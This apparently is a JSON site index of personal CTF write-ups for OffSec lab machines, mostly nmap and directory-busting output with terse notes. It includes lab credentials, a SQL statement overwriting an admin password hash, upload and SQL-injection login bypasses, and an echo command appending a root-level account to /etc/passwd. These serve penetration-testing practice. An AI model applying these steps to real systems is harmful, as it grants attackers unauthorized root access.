# Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 04-29-20 10:31PM \u0026lt;DIR\u0026gt; ImapRetrieval | 03-27-26 06:49AM \u0026lt;DIR\u0026gt; Logs | 04-29-20 10:31PM \u0026lt;DIR\u0026gt; PopRetrieval |_04-29-20 10:32PM \u0026lt;DIR\u0026gt; Spool | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 9998/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-IIS/10.0 | http-title: Site doesn\u0026#39;t have a title (text/html; charset=utf-8). |_Requested resource was /interface/root | uptime-agent-info: HTTP/1.1 400 Bad Request\\x0D | Content-Type: text/html; charset=us-ascii\\x0D | Server: Microsoft-HTTPAPI/2.0\\x0D | Date: Fri, 27 Mar 2026 13:57:39 GMT\\x0D | Connection: close\\x0D | Content-Length: 326\\x0D | \\x0D | \u0026lt;!DOCTYPE HTML PUBLIC \u0026#34;-//W3C//DTD HTML 4.01//EN\u0026#34;\u0026#34;http://www.w3.org/TR/html4/strict.dtd\u0026#34;\u0026gt;\\x0D | \u0026lt;HTML\u0026gt;\u0026lt;HEAD\u0026gt;\u0026lt;TITLE\u0026gt;Bad Request\u0026lt;/TITLE\u0026gt;\\x0D | \u0026lt;META HTTP-EQUIV=\u0026#34;Content-Type\u0026#34; Content=\u0026#34;text/html; charset=us-ascii\u0026#34;\u0026gt;\u0026lt;/HEAD\u0026gt;\\x0D | \u0026lt;BODY\u0026gt;\u0026lt;h2\u0026gt;Bad Request - Invalid Verb\u0026lt;/h2\u0026gt;\\x0D | \u0026lt;hr\u0026gt;\u0026lt;p\u0026gt;HTTP Error 400. The request verb is invalid.\u0026lt;/p\u0026gt;\\x0D |_\u0026lt;/BODY\u0026gt;\u0026lt;/HTML\u0026gt;\\x0D 17001/tcp open remoting MS .NET Remoting services 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-27T13:57:44 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 213.70 seconds Dirbusting # Port 9998 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\n","date":"27 March 2026","externalUrl":null,"permalink":"/ctf-writeups/algernon/","section":"CTF Writeups","summary":"","title":"Algernon","type":"ctf-writeups"},{"content":" CVE-2023-6019 # Overview # OS: Linux IP: 192.168.143.37 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # man this was literally the title and 1 click how is it intermediate.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA) | 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA) |_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519) 9000/tcp open http aiohttp 3.9.1 (Python 3.8) |_http-title: Ray Dashboard |_http-server-header: Python/3.8 aiohttp/3.9.1 36373/tcp open grpc 36977/tcp open grpc 37729/tcp open grpc 38015/tcp open unknown 38811/tcp open grpc 41230/tcp open http WSGIServer 0.2 (Python 3.8.10) |_http-server-header: WSGIServer/0.2 CPython/3.8.10 |_http-title: Site doesn\u0026#39;t have a title (text/plain; version=0.0.4; charset=utf-8). |_http-trane-info: Problem with XML parsing of /evox/about 44217/tcp open http WSGIServer 0.2 (Python 3.8.10) |_http-server-header: WSGIServer/0.2 CPython/3.8.10 |_http-title: Site doesn\u0026#39;t have a title (text/plain; version=0.0.4; charset=utf-8). 44227/tcp open http WSGIServer 0.2 (Python 3.8.10) |_http-server-header: WSGIServer/0.2 CPython/3.8.10 |_http-title: Site doesn\u0026#39;t have a title (text/plain; version=0.0.4; charset=utf-8). |_http-trane-info: Problem with XML parsing of /evox/about 46711/tcp open grpc 52365/tcp open http aiohttp 3.9.1 (Python 3.8) |_http-server-header: Python/3.8 aiohttp/3.9.1 |_http-title: Site doesn\u0026#39;t have a title (text/plain; charset=utf-8). 59137/tcp open unknown 59484/tcp open grpc Dirbusting # Port 80 # Exploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/cve-2023-6019/","section":"CTF Writeups","summary":"","title":"CVE-2023-6019","type":"ctf-writeups"},{"content":"","date":"26 March 2026","externalUrl":null,"permalink":"/tags/linux/","section":"Tags","summary":"","title":"Linux","type":"tags"},{"content":" Ochima # Overview # OS: Linux IP: 192.168.143.32 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE with exploit and then privesc with cronjob.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # tarting Nmap 7.95 ( https://nmap.org ) at 2026-03-26 09:53 EDT Nmap scan report for 192.168.143.32 Host is up (0.083s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.52 (Ubuntu) 8338/tcp open http Python http.server 3.5 - 3.10 |_http-server-header: Maltrail/0.52 |_http-title: Maltrail | http-robots.txt: 1 disallowed entry |_/ Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nPort 8338 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nside) ## filter_netmask(s) is/are used to filter results USERS admin:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:0: # changeme! ## local:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:1000:192.168.0.0/16 # changeme! ## Mask custom trail names for non-admin users (UID \u0026gt;= 1000) ENABLE_MASK_CUSTOM true i think there is a cron job running given the existence of the etc_backup.tar file\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/ochima/","section":"CTF Writeups","summary":"","title":"Ochima","type":"ctf-writeups"},{"content":" Payday # Overview # OS: Linux IP: 192.168.143.39 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE and privesc with same user same pass and sudo all.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0) | ssh-hostkey: | 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA) |_ 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA) 80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) |_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6 |_http-title: CS-Cart. Powerful PHP shopping cart software 110/tcp open pop3 Dovecot pop3d | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2008-04-25T02:02:48 |_Not valid after: 2008-05-25T02:02:48 |_ssl-date: 2026-03-26T17:59:28+00:00; +8s from scanner time. |_pop3-capabilities: TOP RESP-CODES UIDL SASL STLS CAPA PIPELINING | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME) 143/tcp open imap Dovecot imapd | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2008-04-25T02:02:48 |_Not valid after: 2008-05-25T02:02:48 |_ssl-date: 2026-03-26T17:59:29+00:00; +8s from scanner time. |_imap-capabilities: completed IDLE Capability OK IMAP4rev1 MULTIAPPEND LOGINDISABLEDA0001 CHILDREN NAMESPACE LOGIN-REFERRALS LITERAL+ SORT UNSELECT SASL-IR STARTTLS THREAD=REFERENCES 445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME) 993/tcp open ssl/imap Dovecot imapd | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_ssl-date: 2026-03-26T17:59:28+00:00; +8s from scanner time. | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2008-04-25T02:02:48 |_Not valid after: 2008-05-25T02:02:48 995/tcp open ssl/pop3 Dovecot pop3d | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_pop3-capabilities: TOP RESP-CODES UIDL SASL(PLAIN) USER CAPA PIPELINING |_ssl-date: 2026-03-26T17:59:29+00:00; +9s from scanner time. | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2008-04-25T02:02:48 |_Not valid after: 2008-05-25T02:02:48 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) | smb-os-discovery: | OS: Unix (Samba 3.0.26a) | Computer name: payday | NetBIOS computer name: | Domain name: | FQDN: payday |_ System time: 2026-03-26T13:59:16-04:00 |_clock-skew: mean: 40m08s, deviation: 1h37m59s, median: 7s |_nbstat: NetBIOS name: PAYDAY, NetBIOS user: \u0026lt;unknown\u0026gt;, NetBIOS MAC: \u0026lt;unknown\u0026gt; (unknown) Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/payday/","section":"CTF Writeups","summary":"","title":"Payday","type":"ctf-writeups"},{"content":" Sea # Overview # OS: Linux IP: 192.168.143.162 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # exposed creds.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.159 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.5 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-rw-r-- 1 0 0 5637 Jun 14 2025 log_01.log | -rw-rw-r-- 1 0 0 7181 Jun 15 2025 log_02.log | -rw-rw-r-- 1 0 0 5627 Jun 14 2025 log_03.log |_-rw-rw-r-- 1 0 0 5687 Jun 14 2025 log_04.log 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA) |_ 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) |_http-title: Villa Agency - Real Estate HTML5 Template 55743/tcp open http Apache httpd 2.4.58 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.58 (Ubuntu) |_http-title: Sea Device type: general purpose Running: Linux 5.X OS CPE: cpe:/o:linux:linux_kernel:5 Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nPort 55743 # I validated this step using the evidence below before moving forward in the chain.\nFTP # I validated this step using the evidence below before moving forward in the chain.\nExploitation # these dont seem to work then i realized that i was loojking at the wrong directory\nwell the old pass worked for root\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/sea/","section":"CTF Writeups","summary":"","title":"Sea","type":"ctf-writeups"},{"content":" Snookums # Overview # OS: Linux IP: 192.168.143.58 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE and privesc, double b64.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can\u0026#39;t get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.45.159 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.2 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA) | 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA) |_ 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Simple PHP Photo Gallery 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA) 445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA) 3306/tcp open mysql MySQL (unauthorized) 33060/tcp open mysqlx MySQL X protocol listener Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # https://github.com/beauknowstech/SimplePHPGal-RCE.py/blob/main/SimplePHPGal-RCE.py\nMalapropDoffUtilize1337\njosh VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0=\nmichael U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==\nserena VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==\nMobilizeHissSeedtime747 HockSydneyCertify123 OverallCrestLean000\nafter ssh into michael we can see that /etc//passwd is writable by us\n\\\nlets generate a password\nopenssl passwd -1 -salt password password\n$1$password$Da2mWXlxe6J7jtww12SNG/\necho \u0026lsquo;owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash\u0026rsquo; \u0026raquo; /etc/passwd\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/snookums/","section":"CTF Writeups","summary":"","title":"Snookums","type":"ctf-writeups"},{"content":" vmdak # Overview # OS: Linux IP: 192.168.143.103 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access through rce exploit and then privesc thorough exposed creds and exposed jenkins interface on local port.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.159 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.5 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 1752 Sep 19 2024 config.xml 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA) |_ 256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 9443/tcp open ssl/http Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=vmdak.local/organizationName=PrisonManagement/stateOrProvinceName=California/countryName=US | Subject Alternative Name: DNS:vmdak.local | Not valid before: 2024-08-20T09:21:33 |_Not valid after: 2025-08-20T09:21:33 |_http-title: Home - Prison Management System Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nPort 9443 # I validated this step using the evidence below before moving forward in the chain.\nFTP # I validated this step using the evidence below before moving forward in the chain.\nConnected to 192.168.143.103. 220 (vsFTPd 3.0.5) Name (192.168.143.103:kali): Anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp\u0026gt; ls 229 Entering Extended Passive Mode (|||27358|) 150 Here comes the directory listing. -rw-r--r-- 1 0 0 1752 Sep 19 2024 config.xml 226 Directory send OK. ftp\u0026gt; get config.xml local: config.xml remote: config.xml 229 Entering Extended Passive Mode (|||29902|) 150 Opening BINARY mode data connection for config.xml (1752 bytes). 100% |*************************************************************************************************| 1752 34.09 MiB/s 00:00 ETA 226 Transfer complete. 1752 bytes received in 00:00 (20.56 KiB/s) ftp\u0026gt; config.xml file grabbed\n2.401.2 Exploitation # was able to bypass admin login form w sqlimal\nmalcom :: RonnyCache001\nadmin :: admin123\nwow that was simple, i just changed the content type from php to image/jpeg and was able to upload then on rightclicking and visiting the image i got the shell\ncreds worked for vmdak\nvmdak :: RonnyCache001\nlets check this site out after portforwarding\nwe know from before the version of this particular jenkins sinstance and is vulnerable to path read so lets try using that\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/vmdak/","section":"CTF Writeups","summary":"","title":"vmdak","type":"ctf-writeups"},{"content":" BitLocker # Overview # OS: Linux IP: 192.168.143.186 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # Exposed creds updated mysql db pass to work w authenticated rce and then privesc with creds in a process and thensudo perms over .py.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA) |_ 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519) 80/tcp open http Apache httpd | http-git: | 192.168.143.186:80/.git/ | Git repository found! | .git/config matched patterns \u0026#39;user\u0026#39; | Repository description: Unnamed repository; edit this file \u0026#39;description\u0026#39; to name the... |_ Last commit message: created .env to store the database configuration |_http-server-header: Apache |_http-title: Did not follow redirect to http://bitforge.lab/ 3306/tcp open mysql MySQL (blocked - too many connection errors) 9000/tcp closed cslistener Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterO Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nthis tool has RCE if we get creds to authenticate with hmm,\nGitdump # Repository artifacts here gave practical context that directly helped the next move.\nwe got the mysql creds as BitForgeAdmin and pass as **B1tForG3S0ftw4r3S0lutions\ndoesnt work on the portal lets try msql**\nMysql # ok i had to refer to a writeup because i got lost after this, we can just change the cred like this\nExploitation # UPDATE planning_user SET password=\u0026#39;df5b909019c9b1659e86e0d6bf8da81d6fa3499e\u0026#39; WHERE user_id=\u0026#39;ADM\u0026#39;; and now we are able to login with default admin creds\ndont know what this is about but on running pspy we were able to catch jacks password\njack\nj4cKF0rg3@445\n","date":"25 March 2026","externalUrl":null,"permalink":"/ctf-writeups/bitlocker/","section":"CTF Writeups","summary":"","title":"BitLocker","type":"ctf-writeups"},{"content":" Jordak # Overview # OS: Linux IP: 192.168.143.109 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # simple RCE with public exploit and then privesc with env variable sudo perm.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA) |_ 256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-trane-info: Problem with XML parsing of /evox/about |_http-server-header: Apache/2.4.58 (Ubuntu) | http-robots.txt: 1 disallowed entry |_/ Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Dirbusting # ┌──(kali㉿kali)-[~/Desktop/Boxes/Offsec/jordak] └─$ feroxbuster --url http://192.168.143.109// -x php,html.txt ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \\ \\_/ | | \\ |__ | |___ | \\ | \\ | \\__, \\__/ / \\ | |__/ |___ by Ben \u0026#34;epi\u0026#34; Risher 🤓 ver: 2.13.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://192.168.143.109/ 🚩 In-Scope Url │ 192.168.143.109 🚀 Threads │ 50 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.13.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php, html.txt] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 403 GET 9l 28w 280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 307 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 404 GET 9l 31w 277c http://192.168.143.109/css 200 GET 22l 105w 5952c http://192.168.143.109/icons/ubuntu-logo.png 301 GET 9l 28w 317c http://192.168.143.109/docs =\u0026gt; http://192.168.143.109/docs/ 301 GET 9l 28w 319c http://192.168.143.109/assets =\u0026gt; http://192.168.143.109/assets/ 200 GET 674l 5644w 35821c http://192.168.143.109/docs/gpl.txt 301 GET 9l 28w 330c http://192.168.143.109/assets/MDI-3.4.93 =\u0026gt; http://192.168.143.109/assets/MDI-3.4.93/ 301 GET 9l 28w 346c http://192.168.143.109/assets/bootstrap-datepicker-1.8.0 =\u0026gt; http://192.168.143.109/assets/bootstrap-datepicker-1.8.0/ 301 GET 9l 28w 338c http://192.168.143.109/assets/fullcalendar-2.8.0 =\u0026gt; http://192.168.143.109/assets/fullcalendar-2.8.0/ 200 GET 117l 432w 7887c http://192.168.143.109/assets/images/logo_complex.svg 200 GET 57l 369w 22401c http://192.168.143.109/assets/images/logo_simple.png 200 GET 3l 12w 342c http://192.168.143.109/assets/images/morning.png 200 GET 3l 9w 516c http://192.168.143.109/assets/images/leave_1d_MM.png 200 GET 7l 14w 584c http://192.168.143.109/assets/images/leave_2d_none.png 200 GET 15l 62w 3732c http://192.168.143.109/assets/images/application.png 200 GET 4l 9w 329c http://192.168.143.109/assets/images/leave_1d_MA.png 200 GET 3l 18w 634c http://192.168.143.109/assets/images/leave_2d_AA.png 200 GET 3l 8w 598c http://192.168.143.109/assets/images/leave_2d_MM.png 200 GET 4l 14w 490c http://192.168.143.109/assets/images/leave_2d_MA.png 200 GET 3l 7w 205c http://192.168.143.109/assets/images/day.png 200 GET 36l 182w 5310c http://192.168.143.109/assets/images/loading.gif 200 GET 3l 8w 467c http://192.168.143.109/assets/images/leave_1d_AA.png 200 GET 4l 10w 433c http://192.168.143.109/assets/images/leave_none.png 200 GET 10l 28w 1567c http://192.168.143.109/assets/images/brand.png 200 GET 52l 256w 23241c http://192.168.143.109/assets/bootstrap/img/glyphicons-halflings.png 200 GET 23l 151w 16783c http://192.168.143.109/assets/bootstrap/img/glyphicons-halflings-white.png 404 GET 9l 31w 277c http://192.168.143.109/js 200 GET 363l 961w 10671c http://192.168.143.109/ 200 GET 51l 381w 2547c http://192.168.143.109/docs/license.txt 404 GET 9l 31w 277c http://192.168.143.109/css.php 301 GET 9l 28w 333c http://192.168.143.109/assets/select2-4.0.5 =\u0026gt; http://192.168.143.109/assets/select2-4.0.5/ 301 GET 9l 28w 337c http://192.168.143.109/assets/swagger-ui-3.20.9 =\u0026gt; http://192.168.143.109/assets/swagger-ui-3.20.9/ 301 GET 9l 28w 333c http://192.168.143.109/assets/jsTree-3.3.10 =\u0026gt; http://192.168.143.109/assets/jsTree-3.3.10/ 200 GET 163l 1114w 8433c http://192.168.143.109/docs/install/README.md 200 GET 38l 226w 21693c http://192.168.143.109/docs/configuration.xlsx 404 GET 9l 31w 277c http://192.168.143.109/css.html.txt 404 GET 9l 31w 277c http://192.168.143.109/js.php 200 GET 7l 65w 4964c http://192.168.143.109/assets/js/toe.min.js 200 GET 7l 315w 10605c http://192.168.143.109/assets/js/clipboard-1.6.1.min.js 200 GET 6l 153w 6197c http://192.168.143.109/assets/js/bootbox.min.js 200 GET 62l 175w 1607c http://192.168.143.109/docs/install/lighttpd/lighttpd.conf 200 GET 6l 271w 9977c http://192.168.143.109/assets/js/bootbox-4.4.0.min.js 200 GET 114l 351w 4116c http://192.168.143.109/docs/install/nginx/default 301 GET 9l 28w 346c http://192.168.143.109/assets/datatable/ColReorder-1.3.1 =\u0026gt; http://192.168.143.109/assets/datatable/ColReorder-1.3.1/ 301 GET 9l 28w 344c http://192.168.143.109/assets/datatable/pdfmake-0.1.18 =\u0026gt; http://192.168.143.109/assets/datatable/pdfmake-0.1.18/ 301 GET 9l 28w 343c http://192.168.143.109/assets/datatable/Buttons-1.1.2 =\u0026gt; http://192.168.143.109/assets/datatable/Buttons-1.1.2/ 301 GET 9l 28w 347c http://192.168.143.109/assets/datatable/FixedHeader-3.1.1 =\u0026gt; http://192.168.143.109/assets/datatable/FixedHeader-3.1.1/ 301 GET 9l 28w 342c http://192.168.143.109/assets/datatable/Select-1.1.2 =\u0026gt; http://192.168.143.109/assets/datatable/Select-1.1.2/ 301 GET 9l 28w 341c http://192.168.143.109/assets/datatable/JSZip-2.5.0 =\u0026gt; http://192.168.143.109/assets/datatable/JSZip-2.5.0/ 301 GET 9l 28w 346c http://192.168.143.109/assets/datatable/Responsive-2.0.2 =\u0026gt; http://192.168.143.109/assets/datatable/Responsive-2.0.2/ 301 GET 9l 28w 344c http://192.168.143.109/assets/datatable/KeyTable-2.1.1 =\u0026gt; http://192.168.143.109/assets/datatable/KeyTable-2.1.1/ 200 GET 181l 557w 3463c http://192.168.143.109/assets/ckeditor/build-config.js 200 GET 